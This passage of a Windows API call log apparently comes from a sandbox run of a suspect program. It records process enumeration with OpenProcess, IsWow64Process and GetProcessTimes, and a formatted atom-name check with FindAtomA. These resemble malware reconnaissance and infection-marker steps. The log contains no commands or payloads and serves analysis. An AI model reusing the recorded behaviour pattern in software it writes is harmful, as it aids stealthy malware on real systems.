	[0074.962] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.962] CloseHandle (hObject=0x224) returned 1
	[0074.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.963] CloseHandle (hObject=0x224) returned 1
	[0074.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.963] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.963] CloseHandle (hObject=0x224) returned 1
	[0074.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.964] CloseHandle (hObject=0x224) returned 1
	[0074.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb30, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.964] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.964] CloseHandle (hObject=0x224) returned 1
	[0074.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.965] CloseHandle (hObject=0x224) returned 1
	[0074.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.965] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.965] CloseHandle (hObject=0x224) returned 1
	[0074.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728838, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.966] CloseHandle (hObject=0x224) returned 1
	[0074.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.966] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.967] CloseHandle (hObject=0x224) returned 1
	[0074.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.967] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.967] CloseHandle (hObject=0x224) returned 1
	[0074.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eb08, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.968] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.968] CloseHandle (hObject=0x224) returned 1
	[0074.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.968] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.968] CloseHandle (hObject=0x224) returned 1
	[0074.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.969] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.970] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.971] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetLastError () returned 0x5
	[0074.972] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.973] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.973] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.973] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.974] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.975] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.976] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetLastError () returned 0x5
	[0074.977] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.978] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.978] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.979] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.979] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.979] CloseHandle (hObject=0x224) returned 1
	[0074.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.980] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.980] CloseHandle (hObject=0x224) returned 1
	[0074.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eab8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.981] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.981] CloseHandle (hObject=0x224) returned 1
	[0074.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0075.014] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.025] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.025] CloseHandle (hObject=0x224) returned 1
	[0075.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.026] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.026] CloseHandle (hObject=0x224) returned 1
	[0075.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728998, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.027] CloseHandle (hObject=0x224) returned 1
	[0075.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.027] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.027] CloseHandle (hObject=0x224) returned 1
	[0075.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.028] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.028] CloseHandle (hObject=0x224) returned 1
